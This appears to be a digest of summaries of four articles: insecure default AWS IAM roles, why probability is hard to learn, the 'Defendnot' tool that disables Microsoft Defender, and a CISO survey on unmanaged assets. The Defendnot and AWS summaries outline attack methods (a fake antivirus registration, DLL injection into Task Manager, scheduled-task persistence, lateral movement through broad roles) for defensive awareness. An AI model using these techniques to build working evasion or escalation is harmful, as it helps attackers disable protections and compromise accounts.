Author: info@thehackernews.com (The Hacker News)

URL: https://thehackernews.com/2025/05/aws-default-iam-roles-found-to-enable.html

ONE SENTENCE SUMMARY:

Researchers discovered insecure default IAM roles in AWS services enabling attackers to escalate privileges and compromise entire AWS accounts.

MAIN POINTS:

  1. Default IAM roles in AWS services grant overly broad permissions, enabling privilege escalation.
  2. Vulnerable IAM roles found in AWS services like SageMaker, Glue, EMR, and Lightsail.
  3. Similar issues identified in open-source framework Ray, using AmazonS3FullAccess policy.
  4. Attackers exploit default IAM roles to move laterally across AWS services.
  5. IAM roles with AmazonS3FullAccess provide complete read/write access to all S3 buckets.
  6. Attackers can modify AWS assets such as CloudFormation templates and SageMaker resources.
  7. Malicious machine learning models uploaded to Hugging Face can execute arbitrary code on SageMaker.
  8. AWS addressed vulnerabilities by restricting AmazonS3FullAccess policy for default roles.
  9. Researchers advise organizations to audit and tightly scope default IAM role permissions.
  10. Similar privilege escalation vulnerability found in Azure Storage mounting utility AZNFS-mount.

TAKEAWAYS:

  1. Default IAM roles must be strictly limited to required resources and actions.
  2. Organizations should proactively audit default IAM role permissions to minimize risk.
  3. Permissive IAM roles can break isolation boundaries between cloud services.
  4. Attackers leverage broad IAM permissions for lateral movement and privilege escalation.
  5. Cloud providers regularly patch vulnerabilities; organizations must promptly apply security updates.

Why Probability Theory is Hard. It’s not because you’re stupid or…

Source: Medium

Author: Graeme Keith

URL: https://www.cantorsparadise.com/why-probability-theory-is-hard-af838f053882

ONE SENTENCE SUMMARY:

Probability theory is fundamentally challenging due to its non-intuitive nature, conceptual confusion, and reliance on deliberate, slow cognitive processing.

MAIN POINTS:

  1. Probability theory lacks intuitive understanding, unlike mechanical systems we naturally learn through repetition.
  2. Humans struggle to develop reliable intuition for uncertain systems due to inconsistent outcomes.
  3. Kahnemann’s “Thinking Fast and Slow” emphasizes probability’s reliance on slow, deliberate System II thinking.
  4. Even experienced mathematicians rarely develop instinctive probabilistic intuitions, despite extensive practice.
  5. Probability theorists disagree fundamentally on definitions, causing confusion for learners.
  6. Practical probability problems often involve unclear outcome spaces, complicating conceptual clarity.
  7. Probability education frequently resorts to rote memorization due to conceptual complexity.
  8. Notation in probability theory is often confusing, complicating student comprehension.
  9. Despite complexity, basic probability knowledge significantly improves decision-making under uncertainty.
  10. Minimal probabilistic understanding is vastly superior to purely intuitive or guess-based approaches.

TAKEAWAYS:

  1. Accept that probability is inherently difficult, not due to personal inadequacy.
  2. Focus on developing methodical, slow-thinking approaches to probability problems.
  3. Be patient and kind with yourself when struggling with probabilistic concepts.
  4. Prioritize basic probabilistic literacy to substantially enhance practical decision-making.
  5. Understand that conceptual disagreements within probability theory contribute to its learning difficulty.

New ‘Defendnot’ tool tricks Windows into disabling Microsoft Defender

Source: BleepingComputer

Author: Lawrence Abrams

URL: https://www.bleepingcomputer.com/news/microsoft/new-defendnot-tool-tricks-windows-into-disabling-microsoft-defender/

ONE SENTENCE SUMMARY:

The Defendnot tool exploits an undocumented Windows API to disable Microsoft Defender by registering a fake antivirus product.

MAIN POINTS:

  1. Defendnot disables Microsoft Defender by registering a fake antivirus using Windows Security Center API.
  2. Windows disables Defender automatically when another antivirus registers to prevent security conflicts.
  3. Researcher es3n1n developed Defendnot based on an earlier project called no-defender.
  4. The earlier no-defender tool was removed from GitHub due to a DMCA copyright claim.
  5. Defendnot avoids legal issues by using a self-built dummy antivirus DLL rather than third-party code.
  6. Protected Process Light (PPL) and digital signatures normally safeguard the WSC API.
  7. Defendnot bypasses security by injecting its DLL into the trusted Microsoft-signed Taskmgr.exe process.
  8. The tool supports configuration via ctx.bin file, custom antivirus names, and verbose logging.
  9. Defendnot achieves persistence by creating an autorun entry in Windows Task Scheduler.
  10. Microsoft Defender identifies and quarantines Defendnot as ‘Win32/Sabsik.FL.!ml’.

TAKEAWAYS:

  1. Windows Security Center API can be manipulated to disable built-in security defenses.
  2. Trusted processes like Task Manager can be exploited to bypass Windows security protections.
  3. Persistence mechanisms via Task Scheduler highlight the importance of monitoring scheduled tasks.
  4. Microsoft Defender actively detects and blocks Defendnot, signaling ongoing defender capabilities.
  5. Security teams should be aware of undocumented APIs and regularly audit registered antivirus products.

73% of CISOs admit security incidents due to unknown or unmanaged assets

Source: 73% of CISOs admit security incidents due to unknown or unmanaged assets | CSO Online

Author: unknown

URL: https://www.csoonline.com/article/3980431/more-assets-more-attack-surface-more-risk.html

Key Takeaways:

  1. Lack of Asset Visibility and Accurate Management
    Almost three-quarters (73%) of cybersecurity leaders experienced incidents directly linked to unidentified or improperly managed IT assets. Without full visibility into their digital environments, organizations struggle to fully grasp the extent and nature of their potential vulnerabilities, significantly weakening their cybersecurity.

  2. Recognition of Impact on Business Risk
    Approximately 9 out of 10 executives recognize the critical importance of effectively managing the digital attack surface as it directly affects business risk. Security issues stemming from mismanaged or unknown IT assets can have serious consequences, including interruptions in business continuity (42%), harm to customer trust and brand reputation (39%), diminished competitiveness (39%), weakened supplier relationships (39%), and negative impacts on employee productivity and financial performance (38% each).

  3. Inadequate adoption of Proactive Risk Management
    Despite clear recognition of the threat and the potential negative impacts on business operations, only 43% of companies actively use specialized tools for proactive attack surface management. A large majority (58%) stated they lack continuous monitoring processes—even though such proactive security management tools and monitoring are essential for promptly mitigating and containing cybersecurity risks.

  4. Urgent Call to Action
    The survey highlights an increasing urgency for improving cybersecurity posture. Many enterprises remain behind the curve, reluctant or slow in adopting robust security strategies, tools, and ongoing monitoring processes needed to contain their rapidly expanding cyber risks. Cyber risk management must be prioritized at the highest levels to safeguard enterprises effectively.

In conclusion, the Trend Micro survey points to a common cybersecurity challenge: while businesses are aware of the problem and its serious consequences, actual implementation to proactively manage and reduce the attack surface remains limited and inadequate. Chief security officers and business leaders must urgently prioritize comprehensive visibility, proper asset inventory management, continuous risk monitoring, and proactive management to minimize cybersecurity incidents and shield their organization from severe business disruptions.